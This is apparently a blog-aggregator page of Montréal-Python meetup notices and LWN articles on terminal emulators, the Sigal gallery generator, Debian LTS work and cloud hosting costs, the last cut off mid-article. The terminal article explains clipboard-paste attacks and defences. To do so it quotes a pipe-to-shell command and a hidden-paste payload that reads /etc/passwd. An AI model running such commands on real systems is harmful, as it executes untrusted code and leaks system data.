External Blogs

Montréal-Python 71 - Burning Yeti

Montreal Python - Sun, 04/15/2018 - 23:00

Hey!

We are looking for speakers for our next Montreal-Python meetup. Submit your proposals (up to 30 minutes) to team@montrealpython.org, or join us on Slack at http://slack.mtlpy.org/ if you would like to discuss them.

Cheers!

When

Monday, May 7th, 2018, 6:00PM-9:00PM

Where

TBD

Categories: External Blogs

A look at terminal emulators, part 1

Anarcat - Thu, 03/29/2018 - 19:00

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride in using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal        Debian         Fedora   Upstream  Notes
Alacritty       N/A            N/A      6debc4f   no releases, Git head
GNOME Terminal  3.22.2         3.26.2   3.28.0    uses GTK3, VTE
Konsole         16.12.0        17.12.2  17.12.3   uses KDE libraries
mlterm          3.5.0          3.7.0    3.8.5     uses VTE, "Multi-lingual terminal"
pterm           0.67           0.70     0.70      PuTTY without ssh, uses GTK2
st              0.6            0.7      0.8.1     "simple terminal"
Terminator      1.90+bzr-1705  1.91     1.91      uses GTK3, VTE
urxvt           9.22           9.22     9.22      main rxvt fork, also known as rxvt-unicode
Xfce Terminal   0.8.3          0.8.7    0.8.7.2   uses GTK3, VTE
xterm           327            330      331       the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia, has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fall back across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and Xfce Terminal), urxvt, st, and xterm all show Sarah's name backwards, as if we would display it as "Haras" in English.
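To make the failure concrete, here is a minimal Python sketch of what a terminal would need to notice. It relies only on the standard `unicodedata` module; the helper names `has_rtl` and `visual_order_rtl` are made up for this illustration, and the reversal shown is a simplification for a run made only of RTL letters, not the full Unicode Bidirectional Algorithm.

```python
import unicodedata

# Bidirectional classes of strongly right-to-left characters:
# "R" covers Hebrew letters, "AL" covers Arabic letters.
RTL_CLASSES = {"R", "AL"}

# "Sarah" in Hebrew, in logical (storage) order: sin, resh, heh.
SARAH = "\u05e9\u05e8\u05d4"


def has_rtl(text):
    """Return True if any character in text is strongly right-to-left."""
    return any(unicodedata.bidirectional(ch) in RTL_CLASSES for ch in text)


def visual_order_rtl(text):
    """Left-to-right screen order for a run made only of RTL letters.

    The first logical character must end up in the rightmost cell, so the
    run is simply reversed. Mixed LTR/RTL text needs the full algorithm.
    """
    return list(reversed(text))


if __name__ == "__main__":
    print(has_rtl(SARAH))           # Hebrew letters are class "R"
    print(has_rtl("Sarah"))         # Latin letters are class "L"
    print(visual_order_rtl(SARAH))  # sin comes last, i.e. rightmost
```

A terminal that skips this step fills cells in storage order, which is exactly the "Haras" effect described above.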

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command:

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null;
    clear;
    echo -n "Hello ";
    whoami|tr -d '\n';
    echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \
    Here'"'"'s the first line of your /etc/passwd: ';
    head -n1 /etc/passwd
    git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.
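The bypass is easier to see in code. The sketch below is a hypothetical model of the terminal side, not taken from any terminal's source: `wrap_paste_naive` and `wrap_paste_filtered` are illustrative names, and only the two marker sequences (ESC [ 200 ~ and ESC [ 201 ~) come from the bracketed paste convention itself.

```python
PASTE_START = "\x1b[200~"  # emitted by the terminal before pasted text
PASTE_END = "\x1b[201~"    # emitted by the terminal after pasted text


def wrap_paste_naive(text):
    """Wrap pasted text without looking at its content (vulnerable)."""
    return PASTE_START + text + PASTE_END


def wrap_paste_filtered(text):
    """Strip any embedded end marker before wrapping.

    The loop matters: removing one marker can splice the surrounding
    characters into a new one, so we repeat until none is left.
    """
    while PASTE_END in text:
        text = text.replace(PASTE_END, "")
    return PASTE_START + text + PASTE_END


if __name__ == "__main__":
    evil = "git clone x" + PASTE_END + "\nwhoami\n"
    # Naive wrapping leaves two end markers: the shell believes the paste
    # stops at the first one and treats the rest as typed input.
    print(wrap_paste_naive(evil).count(PASTE_END))
    print(wrap_paste_filtered(evil).count(PASTE_END))
```

Real terminals may filter more aggressively, for example by dropping every control character from the pasted text; this sketch only removes the one sequence that ends the bracketed mode.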

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.
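The rule the plugin applies is simple enough to sketch in a few lines of Python. This is an illustration of the idea only, not the plugin's actual code; `paste_needs_confirmation`, `guarded_paste`, and the `confirm` callback are hypothetical names.

```python
def paste_needs_confirmation(text):
    """A paste containing a newline could run a command immediately."""
    return "\n" in text


def guarded_paste(text, confirm):
    """Return the text to insert, or an empty string if the user refuses.

    confirm is any callable that shows the text to the user and returns
    True to allow the paste (an assumption made for this sketch).
    """
    if paste_needs_confirmation(text) and not confirm(text):
        return ""
    return text


if __name__ == "__main__":
    refuse_all = lambda text: False
    print(repr(guarded_paste("ls -l", refuse_all)))        # no newline: passes
    print(repr(guarded_paste("ls -l\nwhoami\n", refuse_all)))  # blocked
```

Because the check happens before anything reaches the shell, it does not depend on the shell or remote host being configured for bracketed paste.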

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only an Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems, however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.
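For readers who want to try this themselves, the following Python sketch shows the two kinds of escape sequences involved. The SGR forms `38;2;R;G;B` (true color) and `38;5;N` (256-color palette) and the six cube levels are the usual xterm conventions; the function names are invented here, and the approximation deliberately ignores the grayscale ramp (palette entries 232 to 255), so it is cruder than what a real terminal might do.

```python
# Intensity steps of the 6x6x6 color cube in the xterm 256-color palette.
CUBE_LEVELS = (0, 95, 135, 175, 215, 255)


def truecolor_fg(r, g, b):
    """Escape sequence selecting a 24-bit ("true color") foreground."""
    return "\x1b[38;2;{};{};{}m".format(r, g, b)


def nearest_level(value):
    """Index of the cube level closest to an 8-bit channel value."""
    return min(range(6), key=lambda i: abs(CUBE_LEVELS[i] - value))


def rgb_to_256(r, g, b):
    """Approximate an RGB color with an entry of the 6x6x6 cube."""
    return 16 + 36 * nearest_level(r) + 6 * nearest_level(g) + nearest_level(b)


def palette_fg(r, g, b):
    """Escape sequence selecting the nearest 256-color foreground."""
    return "\x1b[38;5;{}m".format(rgb_to_256(r, g, b))


if __name__ == "__main__":
    reset = "\x1b[0m"
    # Print the same gradient twice; banding in the second line shows
    # what is lost when falling back to the palette.
    for make in (truecolor_fg, palette_fg):
        print("".join(make(v, 80, 255 - v) + "#" for v in range(0, 256, 4)) + reset)
```

On a terminal without true color support, the first line is where garbage, wrong colors, or blinking text would show up.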

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Montréal-Python 70 - Atomic Zucchini

Montreal Python - Tue, 03/27/2018 - 23:00

It is with pleasure that we announce the presentations of our 70th meetup. Unexpected events forced us to postpone last month's meetup. But don't worry, we are back in force with a menu full of Python delights!

Thanks to Shopify for sponsoring this event by providing the venue and pizza!

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 7:30PM - Break
  • 7:45PM - Presentations
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations

SikuliX: automate everything you see with a single tool (Windows, Mac, Linux) - Dominik Seelos

SikuliX is an automation tool that lets us script (in Python 2.7) recurring tasks with very little automation experience. SikuliX works through image recognition and can do anything a keyboard and mouse can (Windows, Mac, and Linux).

Automate All The Things with Home Assistant - Philippe Gauthier

Would you pass a junior data scientist interview? - Nicolas Coallier

A demonstration of the modules and the level of Python needed to be hired as a junior data scientist at a company. We have an internal Python test that we give during interviews. I will go through the test, which includes the answers.

Modules covered: Pandas, NumPy, scikit-learn, Beautiful Soup, re...
ML theory covered: classification, segmentation, LSTM, boosting
Other topics covered: scraping, NLP, data structures

When

Monday, April 9th, 2018 at 6:00PM

Where

Shopify, 490 rue de la Gauchetière Montréal, Québec

Montréal-Python 70 - Call for speakers - Atomic Zucchini

Montreal Python - Tue, 03/13/2018 - 23:00

The next Montréal-Python will be happening between Easter and your next sugar shack trip!

As always, we are looking for speakers!

Submit your proposals (up to 30 minutes) to team@montrealpython.org, or join us on Slack at http://slack.mtlpy.org/ if you would like to discuss them.

Cheers!

When

Monday, March 12th, 2018, 6:00PM-9:00PM

Where

TBD

Montréal-Python 70 is gonna be in April

Montreal Python - Fri, 03/09/2018 - 00:00

Hello,

Unfortunately, next Monday's meetup (March 12th) needs to be postponed to next month.

Please send us your talk proposals by email to: mtlpyteam@googlegroups.com

See you in April for MP70 Atomic Zucchini!

Easy photo galleries with Sigal

Anarcat - Tue, 03/06/2018 - 19:00

Sigal is a "simple static gallery generator" with a straightforward design, a nice feature set, and great themes. It was started as a toy project, but has nevertheless grown into a sizable and friendly community. After struggling with maintenance using half a dozen photo gallery projects along the way, I feel I have found a nice little gem that I am happy to share with LWN readers.

CMS vs. SSG

Sigal is part of a growing family of static site generators (SSG), software that generates web sites as static HTML files as opposed to more elaborate Content Management Systems (CMS) that generate HTML content on the fly. A CMS requires specialized server-side software that needs maintenance to keep up to date with security fixes. That software is always running and exposed on the network, whereas a site generated with an SSG is only a collection of never-changing files. This drastically reduces the attack surface as visitors do not (usually) interact with the software directly. Finally, web servers can deliver static content much faster than dynamic content, which means SSGs can offer better performance than a CMS.

Having contributed to a major PHP-based CMS for over a decade, I was glad to finally switch to an SSG (ikiwiki) for my own web site three years ago. My photo gallery, however, was still running on a CMS: after running the venerable Gallery software (in hibernation since 2014), then Coppermine, I ended up using Piwigo. But that required a PHP-enabled web server, which meant chasing an endless stream of security issues. While I did consider non-PHP alternatives like MediaGoblin, that seemed too complicated (requiring Celery, Paste, and PostgreSQL). Really, static site generators had me hooked and there was no turning back.

Initially, I didn't use Sigal, as I first stumbled upon PhotoFloat. It is the brainchild of Jason A. Donenfeld, the same person behind the pass password manager that we previously covered and the WireGuard virtual private network (VPN) as well. PhotoFloat is a small Python program that generates a static gallery running custom JavaScript code. I was enthusiastic about the project: I packaged it for Debian and published patches to implement RSS feeds and multiple gallery support. Unfortunately, patches from contributors would just sit on the mailing list without feedback for months, which led to some users forking the project. Donenfeld was not happy with the result; he decried the new PHP dependency and claimed the fork introduced a directory traversal vulnerability. The fork now seems to be more active than the original and was renamed to MyPhotoShare. But at that point, I was already looking for alternatives and found out about Sigal when browsing a friend's photo gallery.

What is Sigal?

Sigal was created by a French software developer from Lyon, Simon Conseil. In an IRC interview, he said that he started working on Sigal as a "toy project to learn Python", as part of his work in astrophysics data processing at the Very Large Telescope in Chile:

A few years ago, I was already working on astrophysics but with another language (IDL): proprietary, and expensive, like MATLAB. Python was getting used more widely, with the birth of Astropy. So wanting to learn Python, I started to contribute to Pelican, and had the idea to do the same for photo galleries. I was using Piwigo, and felt I didn't need the more dynamic parts (comments, stars, etc.). A static site is so much simpler with some JavaScript library to do most of the job. Add some glue to create the pages, and Sigal was born!

Before starting a new project from scratch, Conseil first looked for alternatives ("Gallerize, lazygal, and a few others") but couldn't find anything satisfactory. He wanted to reuse ideas from Pelican, for example the Jinja2 template engine for themes and the Blinker plugin system, so he started his own project.

Like other static gallery generators, Sigal parses a tree of images and generates thumbnails and HTML pages to show those images. Instead of deploying its own custom JavaScript application for browsing images in the browser, Sigal reuses existing applications like Galleria, PhotoSwipe, and Colorbox. Image metadata is parsed from Exif tags, but a Markdown-formatted text file can also be used to change image or album titles, description, and location. The latest 1.4 release can also read metadata from in-image IPTC tags. Sigal parses regular images using the Pillow library but can also read video files, which get converted to browser-readable video files through the ubiquitous FFmpeg. Sigal has good (if minimal) online documentation and, like any good Python program, can be installed with pip; I am working on packaging it for Debian.

Plugins offer support for image or copyright watermarks. The adjust plugin also allows for minor image adjustments, although those apply to the whole gallery so it is unclear to me how useful that plugin really is. Even novice photographers would more likely make adjustments in a basic image editor like Shotwell, digiKam, or maybe even GIMP before trying to tweak images in a Python configuration file. Finally, another plugin provides a simple RSS feed, which is useful to allow users to keep track of the latest images published in the gallery.

Future plans and limitations

When I asked him about future plans, Conseil said he had "no roadmap":

For me Sigal has been doing its job for a long time now, but the cool thing is that people find it useful and contribute. So my only wish is that this continues and to help the project live for and by its community, which is slowly growing.

Following this lead, I submitted patches and ideas of my own to the project while working on this article. The first shortcoming I have found with Sigal is the lack of access control. A photo gallery is either private or world-readable; there is no way to restrict access to only some albums or photos. I found a way, however, to implement folder password protection using the Basic authentication type for the Apache web server, which I documented in an FAQ entry. It's a little clunky as it uses password files managed through the old htpasswd command. It also means using passwords and, in my usability tests, some family members had trouble typing my weird randomly generated passwords on their tablets. I would have preferred to find a way to use URL-based authentication, with an unguessable one-time link, but I haven't found an easy way to do this in the web server. It can be done by picking a random name for the entire gallery, but not for specific folders, because those get leaked by Sigal. To protect certain pictures, they have to be in a separate gallery, which complicates maintenance.
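The "random name for the entire gallery" approach mentioned above can be sketched with Python's standard `secrets` module. The function name `unguessable_name`, the `gallery` prefix, and the 16-byte token size are assumptions chosen for illustration; nothing here is part of Sigal.

```python
import secrets


def unguessable_name(prefix="gallery", nbytes=16):
    """Build a directory name that is impractical to guess.

    secrets.token_urlsafe draws from the operating system's secure
    random source and only uses characters that are safe in a URL.
    """
    return "{}-{}".format(prefix, secrets.token_urlsafe(nbytes))


if __name__ == "__main__":
    # Publish the gallery under this directory and share the full URL
    # only with the intended audience.
    print(unguessable_name())
```

This only protects the gallery as long as the URL itself stays private and the web server does not list the parent directory.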

Which brings us to gallery operation: to create a Sigal gallery, you need to create a configuration file and run the sigal build command. This is pretty simple but I think it can be made even simpler. I have proposed having a default configuration file so that creating a configuration file isn't required to make new galleries. I also looked at implementing a "daemon" mode that would watch a directory for changes and rebuild when new pictures show up. For now, I have settled on a quick hack based on the entr utility but there's talk of implementing the feature directly in the build command. Such improvements would enable mass hosting of photo galleries with minimal configuration. It would also make it easier to create password-less private galleries with unique, unguessable URLs.
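A "daemon" mode of the kind discussed here could look roughly like the polling loop below. This is a sketch under stated assumptions, not Sigal's implementation and not the entr-based hack: `snapshot` and `watch_and_build` are hypothetical helpers, the two-second interval is arbitrary, and the script is assumed to run from the directory that holds the gallery configuration so that `sigal build` finds it.

```python
import os
import subprocess
import time


def snapshot(root):
    """Map every file path under root to its modification time."""
    state = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                state[path] = os.stat(path).st_mtime_ns
            except OSError:
                pass  # the file vanished between listing and stat
    return state


def watch_and_build(root, interval=2.0, build_cmd=("sigal", "build")):
    """Rebuild the gallery whenever a file is added, removed, or changed."""
    previous = snapshot(root)
    while True:
        time.sleep(interval)
        current = snapshot(root)
        if current != previous:
            # check=False: a failed build should not stop the watcher
            subprocess.run(list(build_cmd), check=False)
            previous = current


if __name__ == "__main__":
    watch_and_build("pictures")  # "pictures" is a placeholder directory
```

Polling is wasteful on large trees; a production version would more likely use the kernel's file notification facilities, which is what tools like entr build on.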

Another patch I am working on is the stream plugin, which creates a new view of the gallery; instead of a folder-based interface, this shows the latest pictures published as a flat list. This is how commercial services like Instagram and Flickr work; even though you can tag pictures or group them by folder, they also offer a unified "stream" view of the latest entries in a gallery. As a demonstration of Sigal's clean design, I was able to quickly find my way in the code base to implement the required changes to the core libraries and unit tests, which are now waiting for review.

In closing, I have found Sigal to be a simple and elegant project. As it stands, it should be sufficient for basic galleries, but more demanding photographers and artists might need more elaborate solutions. Ratings, comments, and any form of interactivity will obviously be difficult to implement in Sigal; fans of those features should probably look at CMS solutions like Piwigo or the new Lychee project. But dynamic features are perhaps best kept to purpose-built free software like Discourse that embeds dynamic controls in static sites. In any case, for a system administrator tired of maintaining old software, the idea of having only static web sites to worry about is incredibly comforting. That simplicity and reliability has made Sigal a key tool in my amateur photographer toolbox.

A set of demos is available for readers who want to see more themes and play around with a real gallery.

This article first appeared in the Linux Weekly News.

February 2018 report: LTS, ...

Anarcat - Thu, 03/01/2018 - 12:07

Debian Long Term Support (LTS)

This is my monthly Debian LTS report. This month was exclusively dedicated to my frontdesk work. I actually forgot to do it the first week and had to play catch-up during the weekend, so I brought up a discussion about how to avoid those problems in the future. I proposed an automated reminder system, but it turns out people found this was overkill. Instead, Chris Lamb suggested we simply send a ping to the next person in the list, which proved useful the next time I was up. In the two weeks I was frontdesk, I ended up triaging the following notable packages:

  • isc-dhcp - remote code execution exploits - time to get rid of those root-level daemons?
  • simplesamlphp - under embargo, quite curious
  • golang - the return of remote code execution in go get (CVE-2018-6574, similar to CVE-2017-15041 and CVE-2018-7187) - ended up being marked as minor, unfortunately
  • systemd - CVE-2017-18078 was marked as unimportant as this was neutralized by kernel hardening and systemd was not really in use back in wheezy. Besides, CVE-2013-4392 was about a similar functionality which was claimed to not be supported in wheezy. I did, however, propose to forcibly enable the kernel hardening through default sysctl configurations (Debian bug #889098) so that custom kernels would be covered by the protection in stable suites.

There was more minor triage work not mentioned here; those are just the juicy ones...

Speaking of juicy, the other thing I did during the month was to help with the documentation on the Meltdown and Spectre attacks on Intel CPUs. Much has been written about this and I won't do yet another summary. However, it seems that no one had actually written even semi-official documentation on the state of fixes in Debian, which led to many questions to the (LTS) security team(s). Ola Lundqvist did a first draft of a page detailing the current status, and I expanded on the page to add formatting and more details. The page is visible here:

https://wiki.debian.org/DebianSecurity/SpectreMeltdown

I'm still not fully happy with the results: we're missing some userland like Qemu and a timeline of fixes. In comparison, the Ubuntu page still looks much better in my opinion. But it's leagues ahead of what we had before, which was nothing... The next step for LTS is to backport the retpoline fixes back into a compiler. Roberto C. Sanchez is working on this, and the remaining question is whether we try to backport to GCC 4.7 or we backport GCC 4.9 itself into wheezy. In any case, it's a significant challenge and I'm glad I'm not the one dealing with such arcane code right now...

Other free software work

Not much to say this month; in no particular order:

  • did the usual linkchecker maintenance
  • finally got my Prometheus node exporter directory size sample merged
  • added some docs updating the Dat project comparison with IPFS after investigating Dat. Turns out Dat's security guarantees aren't as good as I hoped...
  • reviewed some PRs in the Git-Mediawiki project
  • found what I consider to be a security issue in the Borg backup software, but upstream did not treat it as such. This ended up as a simple issue that I do not expect much from.
  • so I got more interested in the Restic community as well. I proposed a code of conduct to test the waters, but the feedback so far has been mixed, unfortunately.
  • started working on a streams page for the Sigal gallery. Expect an article about Sigal soon.
  • published undertime in Debian, which brought a slew of bug reports (and consequent fixes).
  • started looking at alternative GUIs because GTK2 is going away and I need to port two projects. I have a list of "hello world" in various frameworks now, still not sure which one I'll use.
  • also worked on updating the Charybdis and Atheme-services packages with new co-maintainers (hi!)
  • worked with Darktable to try and render an exotic image out of my new camera. Might turn into a LWN article eventually as well.
  • started getting more involved in the local free software forum, a nice little community. In particular, I went to a "repair cafe" and wrote a full report on the experience there.

I'm trying to write more for LWN these days so it's taking more time. I'm also trying to turn those reports into articles to help ramp up that rhythm, which means you'll need to subscribe to LWN to get the latest goods before the two-week exclusivity period ends.

The cost of hosting in the cloud

Anarcat - Wed, 02/28/2018 - 12:00

This is one part of my coverage of KubeCon Austin 2017.

Should we host in the cloud or on our own servers? This question was at the center of Dmytro Dyachuk's talk, given during KubeCon + CloudNativeCon last November. While many services simply launch in the cloud without the organizations behind them considering other options, large content-hosting services have actually moved back to their own data centers: Dropbox migrated in 2016 and Instagram in 2014. Because such transitions can be expensive and risky, understanding the economics of hosting is a critical part of launching a new service. Actual hosting costs are often misunderstood, or secret, so it is sometimes difficult to get the numbers right. In this article, we'll use Dyachuk's talk to try to answer the "million dollar question": "buy or rent?"

Computing the cost of compute

So how much does hosting cost these days? To answer that apparently trivial question, Dyachuk presented a detailed analysis made from a spreadsheet that compares the costs of "colocation" (running your own hardware in somebody else's data center) versus those of hosting in the cloud. For the latter, Dyachuk chose Amazon Web Services (AWS) as a standard, reminding the audience that "63% of Kubernetes deployments actually run off AWS". Dyachuk focused only on the cloud and colocation services, discarding the option of building your own data center as too complex and expensive. The question is whether it still makes sense to operate your own servers when, as Dyachuk explained, "CPU and memory have become a utility", a transition that Kubernetes is also helping push forward.

Another assumption of his talk is that server uptime isn't that critical anymore; there used to be a time when system administrators would proudly brandish multi-year uptime counters as a proof of server stability. As an example, Dyachuk performed a quick survey in the room and the record was an uptime of 5 years. In response, Dyachuk asked: "how many security patches were missed because of that uptime?" The answer was, of course, "all of them". Kubernetes helps with security upgrades, in that it provides a self-healing mechanism to automatically re-provision failed services or rotate nodes when rebooting. This changes hardware designs; instead of building custom, application-specific machines, system administrators now deploy large, general-purpose servers that use virtualization technologies to host arbitrary applications in high-density clusters.

When presenting his calculations, Dyachuk explained that "pricing is complicated" and, indeed, his spreadsheet includes hundreds of parameters. However, after reviewing his numbers, I can say that the list is impressively exhaustive, covering server memory, disk, and bandwidth, but also backups, storage, staffing, and networking infrastructure.

For servers, he picked a Supermicro chassis with 224 cores and 512GB of memory from the first result of a Google search. Once amortized over an aggressive three-year rotation plan, the $25,000 machine ends up costing about $8,300 yearly. To compare with Amazon, he picked the m4.10xlarge instance as a commonly used standard, which currently offers 40 cores, 160GB of RAM, and 4Gbps of dedicated storage bandwidth. At the time he did his estimates, the going rate for such a server was $2 per hour or $17,000 per year. So, at first, the physical server looks like a much better deal: half the price and close to quadruple the capacity. But, of course, we also need to factor in networking, power usage, space rental, and staff costs. And this is where things get complicated.
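The figures in this comparison can be checked with a few lines of Python. The inputs are the ones quoted above; the only assumptions added here are a 365-day year of continuous use and straight-line amortization with no resale value.

```python
HOURS_PER_YEAR = 24 * 365  # assumes the instance runs around the clock


def amortized_yearly(price, years):
    """Straight-line yearly cost of a purchase, ignoring resale value."""
    return price / years


def cloud_yearly(hourly_rate):
    """Yearly cost of an instance billed by the hour."""
    return hourly_rate * HOURS_PER_YEAR


server = amortized_yearly(25000, 3)  # Supermicro chassis over three years
cloud = cloud_yearly(2.0)            # m4.10xlarge at $2 per hour

price_ratio = server / cloud         # physical cost relative to cloud
core_ratio = 224 / 40                # physical cores per cloud core
memory_ratio = 512 / 160             # physical memory per cloud memory

if __name__ == "__main__":
    print("server: ${:,.0f}/year".format(server))
    print("cloud:  ${:,.0f}/year".format(cloud))
    print("price ratio:  {:.2f}".format(price_ratio))
    print("core ratio:   {:.1f}x".format(core_ratio))
    print("memory ratio: {:.1f}x".format(memory_ratio))
```

The yearly cloud figure comes out slightly above the rounded $17,000, and the capacity advantage depends on which resource is counted: it is larger for cores than for memory.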

First, colocation rates will vary a lot depending on location. While bandwidth costs are often much lower in large urban centers because of proximity to fast network links, real estate and power prices are often much higher. Bandwidth costs are now the main driver in hosting costs.

For the purpose of his calculation, Dyachuk picked a real-estate figure of $500 per standard cabinet (42U). His calculations yielded a monthly power cost of $4,200 for a full rack, at $0.50/kWh. Those rates seem rather high compared to my local data center, where the rate is closer to $350 for the cabinet and $0.12/kWh for power. Dyachuk took into account that power is usually not "metered billing", where you pay for the actual power usage, but "stepped billing", where you pay for a circuit with a (say) 25-amp breaker regardless of how much power you use in said circuit. This accounts for some of the discrepancy, but the estimate still seems too high to be accurate according to my calculations.
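To get a feel for the gap between the two power rates, here is a rough sketch that treats the bill as if it were metered, which, as noted above, is usually not how colocation power is billed. The 730-hour month and the variable names are assumptions of this sketch.

```python
HOURS_PER_MONTH = 24 * 365 / 12   # assumption: average month of 730 hours

monthly_power_cost = 4_200   # USD, Dyachuk's figure for a full rack
dyachuk_rate = 0.50          # USD per kWh
local_rate = 0.12            # USD per kWh, the author's local data center

# Energy implied by the monthly bill if it were purely metered.
energy_kwh = monthly_power_cost / dyachuk_rate
# Average continuous draw that would consume that much energy.
average_draw_kw = energy_kwh / HOURS_PER_MONTH
# Same consumption billed at the lower local rate.
cost_at_local_rate = energy_kwh * local_rate

print(f"implied consumption: {energy_kwh:,.0f} kWh per month")
print(f"implied average draw: {average_draw_kw:.1f} kW")
print(f"same usage at local rate: ${cost_at_local_rate:,.0f} per month")
```

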